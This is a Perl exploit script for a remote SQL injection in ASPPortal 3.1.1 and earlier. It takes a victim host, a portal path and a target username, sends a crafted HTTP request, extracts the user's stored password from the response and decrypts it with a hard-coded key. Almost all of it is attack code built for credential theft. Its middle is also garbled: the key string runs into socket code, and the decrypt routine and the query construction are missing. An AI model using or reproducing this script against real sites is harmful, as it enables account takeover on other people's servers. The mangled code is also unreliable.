#!/usr/bin/perl #Method found & Exploit scripted by nukedx #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Original advisory: http://www.nukedx.com/?viewdoc=21 #Usage: aspp.pl use IO::Socket; use Math::BigInt; if(@ARGV != 3) { usage(); } else { exploit(); } sub header() { print "\n- NukedX Security Advisory Nr.2006-21\r\n"; print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n"; } sub usage() { header(); print "- Usage: $0 \r\n"; print "- -> Victim's host ex: www.victim.com\r\n"; print "- -> Path to ASPPortal ex: /portal/\r\n"; print "- -> Username that you want password. ex: admin\r\n"; exit(); } sub decrypt () { $lp = length($appass); $apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJnew(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n"; print $ap "GET $apreq HTTP/1.1\n"; print $ap "Accept: */*\n"; print $ap "Referer: $aphost\n"; print $ap "Accept-Language: tr\n"; print $ap "User-Agent: NukeZilla\n"; print $ap "Cache-Control: no-cache\n"; print $ap "Host: $apserver\n"; print $ap "Connection: close\n\n"; print "- Connected...\r\n"; while ($answer = <$ap>) { if ($answer =~ /string: "(.*?)"]'/) { print "- Exploit succeed! Getting $ARGV[2]'s information\r\n"; print "- Username: $ARGV[2]\r\n"; print "- Decrypting password....\r\n"; $appass = $1; $appass =~ s/(")/chr(34)/eg; $appass =~ s/(<)/chr(60)/eg; $appass =~ s/(>)/chr(62)/eg; $appass =~ s/( )/chr(32)/eg; decrypt(); } if ($answer =~ /number of columns/) { print "- This version of ASPPortal is vulnerable too\r\n"; print "- but default query of SQL-Inj. does not work on it\r\n"; print "- So please edit query by manually adding null data..\r\n"; exit(); } } #Exploit failed... print "- Exploit failed\n" } #nukedx.com [2006-03-20]